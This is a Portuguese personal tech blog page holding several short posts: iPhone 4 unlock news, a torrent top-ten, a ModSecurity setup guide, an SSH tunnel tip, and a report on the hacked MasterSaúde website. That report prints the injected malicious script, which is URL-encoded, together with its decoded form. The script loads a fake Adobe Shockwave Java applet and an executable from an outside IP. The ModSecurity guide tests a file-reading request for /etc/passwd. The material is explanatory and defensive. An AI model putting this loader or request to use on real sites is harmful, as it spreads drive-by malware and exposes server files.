Novas informações sobre o jailbreak dos dispositivos A5 (iPhone 4S e iPad 2)
Notícias sobre o desbloqueio da Baseband 04.11.08 do iPhone 4. [2]
Novo blog
Pessoal bom dia.
agradeço aos que me acompanham neste blog, como este blog eu misturo muita coisa, fiz um pra tratar somente sobre assuntos de tecnologia, por favor visitem Cydia Tweak e compartilhem, obrigado.
Notícias sobre o desbloqueio do iPhone 4
Desde a atualização do iPhone 4 para o iOS 5, muitos que possuíam desbloqueio vai software (ultrasn0w) ou hardware (Gevey SIM), são obrigados a utilizar o seu aparelho com um “iPod de luxo”, tudo se deu graças à atualização de baseband (firmware do modem) para a versão 04.11.08.
O ultrasn0w apenas dá suporte para a baseband 01.59.00 do iPhone 4 e o Gevey SIM para as basebands 01.59.00, 02.10.00, 03.10.01 e 04.10.01, e agora?
Nenhum dos hackers conhecidos de iOS deram alguma dica que estejam trabalhando para esse desbloqueio, @pod2g, @MuscleNerd e @p0sixninja estão focados em procurar exploits para lançar uma versão untethered do jailbreak para dispositivos com processador A5 (iPhone 4S e iPad2), o próprio @pod2g, que descobriu o exploit para a versão untethered do jailbreak para dispositivos com processador A4 e inferiores, divulga em seu site que é contra a prática de desbloqueio.
Em novembro de 2011, foram divulgadas informações de um novo SIM para desbloqueio, o Miracle SIM, fabricado por uma hacker (ou seria um grupo de hackers) com o nome de VOLD, este SIM utilizaria o mesmo método do Gevey (SIM Interposer), porém, dois meses já se passaram e nunca ouve um vídeo divulgado por VOLD confirmando a informação.
Na semana passada, Richard Kerr, do site BeijingiPhoneRepair, divulgou que suas fontes informaram que um novo método de desbloqueio será lançado no ano novo chinês, que neste ano se comemora no dia 23 de janeiro, além disso, um hacker desconhecido de Abu Dhabi, @hamzah_akram, divulgou que conseguiu desbloquear a baseband 04.11.08, e sua solução irá se chamar react0r, porém, ainda não divulgou um prazo para lançamento do mesmo.
Escreverei um novo post quando uma nova solução for encontrado para a baseband 04.11.08, por enquanto, não acredite em sites que prometem o desbloqueio, acredite, são falsos, só querem roubar seu dinheiro, lembrando também que no Brasil, o desbloqueio do aparelho é obrigatório (logicamente somente para aparelhos nacionais), caso o seu aparelho seja bloqueado, entre em contato com a sua operadora e solicite o desbloqueio. Até a próxima.
Top 10 dos filmes mais baixados via torrent na última semana.
Segundo o site TorrentFreak, estes foram os filmes mais baixados na última semana:
1 – Ultramarines
2 – 127 Hours (DVDscr)
3 – Megamind (SCR)
4 – Little Fockers (TS)
5 – Winter’s Bone
6 – Inception
7 – TRON: Legacy (TS)
8 – Death Race 2
9 – The Social Network
10 – The Fighter (SCR)
Instalar ModSecurity no Debian Lenny
O ModSecurity (http://www.modsecurity.org), e um firewall para as aplicações web, e ele é muito eficiente para prevenir ataques, abaixo, os passos que segui para configurar o ModSecurity em meu ambiente (Debian Lenny + Apache2):
1 – Os pacotes do ModSecurity não estão disponíveis nos mirrors do Debian, somente no backports, caso você ainda não tenha adicionado o backports em seu mirror, faça o seguinte:
- Edite o seu arquivo de mirrors do apt:
$ vim /etc/apt/sources.list
Adicione a seguinte linha no final do arquivo:
deb http://backports.debian.org/debian-backports lenny-backports main
Então atualize:
$ aptitude update
2 – Instale o ModSecurity:
$ aptitude -t lenny-backports install libapache-mod-security -y
3 – Após a instalação, criei alguns diretórios que achei necessário (apenas uma sugestão, você pode criar os diretórios onde bem entender):
$ mkdir /etc/apache2/logs /etc/apache2/modsecurity
4 – Criar o arquivo de configuração do ModSecurity que irá ser carregado pelo Apache:
$ vim /etc/apache2/conf.d/modsecurity.conf
E adicionar as seguintes linhas no arquivo:
# /etc/init.d/apache2/conf.d/modsecurity.conf
Include modsecurity/*.conf
Include modsecurity/base_rules/*.conf
5 – Entrar no diretório que nós criamos do ModSecurity para copiar as regras que por padrão já vem configuradas:
$ cd /etc/apache2/modsecurity
$ cp -R /usr/share/doc/mod-security-common/examples/rules/* .
6 – Reiniciar o Apache:
$ /etc/init.d/apache2 restart
7 – Verifique se o ModSecurity carregou com o Apache:
$ cat /var/log/apache2/error.log | grep modsecurity
- Deve retornar a seguinte linha:
ModSecurity for Apache/2.5.11 (http://www.modsecurity.org/) configured.
8 – Testando seu ModSecurity:
- Primeiro vamos desabilitar o ModSecurity e reiniciar o Apache:
$ a2dismod mod-security && /etc/init.d/apache2 restart
- Vamos criar um diretório dentro do raiz do apache2, no meu caso, o /var/www:
$ mkdir /var/www/teste
- E vamos criar uma página em PHP, que é capaz de mostrar qualquer arquivo do Servidor:
- Vá até o seu navegador preferido e digite http://servidor.web/index.php?secret_file=/etc/passwd (lembre-se de alterar o servidor.web pelo nome ou IP de seu servidor);
- Você irá conseguir visualizar, no seu browser, o arquivo de usuários locais do sistema;
- Agora vamos habilitar o ModSecurity e reiniciar o Apache:
$ a2enmod mod-security && /etc/init.d/apache2 restart
- Vá novamente em seu navegador favorito e digite novamente http://servidor.web/index.php?secret_file=/etc/passwd (lembre-se de alterar o servidor.web pelo nome ou IP de seu servidor)
- Você irá receber a mensagem de Forbidden;
- Os logs do ModSecurity ficam em /etc/apache2/logs.
Vou estudar melhor as regras do ModSecurity, qualquer novidade eu posto por aqui.
Abraços.
Estrutura da árvore de diretórios do Linux
Como fazer um tunel com SSH
Vou mostrar como fazer um tunel SSH para acessar uma máquina remota e utilizar algum serviço da rede ou algum programa que escute em alguma porta.
Exemplo:
ssh -f guilhermecunha@SERVIDOR-REMOTO -L 1030:SERVIDOR-REMOTO:80 -N
Mas o que esta linha faz?
Esta execução irá fazer com que eu faça login na máquina remota via ssh e faça um tunelamento para a porta 80 usando a porta 1030 localmente. Ou seja, depois de executar este comando vou puder acessar a máquina remota através da porta 1030 da seguinte forma:
http://SERVIDOR-LOCAL:1030
Sendo que o serviço na máquina remota está rodando na porta 80
Site da MasterSaúde hackeado.
Hoje aconteceu algo curioso.
Estava eu fazendo pesquisas em sites de planos de saúde, quando entro no site da MasterSaúde (http://www.mastersaude.com.br), recebo uma mensagem que não possuo o Flash Player instalado, veja na figura:
WTF?? Tenho instalado o Flash Player, o que será?
Peguei o código fonte e dei uma vasculhada, mandei o pro Miguel di Ciurcio Filho (http://osysadmin.blogspot.com) pois ele já havia descoberto um worm no site da Vivo, então ele achou no rodapé o seguinte código:
<script type=”text/javascript”>
<!
document.write(unescape(“%3C%73%63%72%69%70%74%20%74%79%70%65%3D
%22%74%65%78%74%2F%6A
%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A
%2F%2F%32%30%34%2E%33%2E%31%35%36%2E%32%34%36%2F%6A%73%2F%67%6C
%6F%62%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E”))
// >
</script>
Descodificando com o Python:
imPython 2.6.2 (release26maint, Apr 19 2009, 01:56:41)
[GCC 4.3.3] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>> import urllib
>>>
urllib.unquote(“%3C%73%63%72%69%70%74%20%74%79%70%65%3D
%22%74%65%78%74%2F%6A
%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A
%2F%2F%32%30%34%2E%33%2E%31%35%36%2E%32%34%36%2F%6A%73%2F%67%6C
%6F%62%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E”)
‘<script type=”text/javascript”
src=”http://204.3.156.246/js/global.js”></script>’
Conteúdo do arquivo global.js:
/* Setar IP atual logo abaixo */
var url = “204.3.156.246″;
document.write(‘<applet name=”Seu Computador não possui Adobe Shockwave
Player clique em RUN para proseguir ©Adobe Shockwave Player Version
11.5.0.600″ code=”Main.class” archive=”http://’ + url +
‘/js/FlashPlayer.jar” height=”10″ width=”1″><param name=”link”
value=”http://’ + url + ‘/js/install_flash_player_ax.exe”></applet>’);
Eeeeeta… site hackeado…
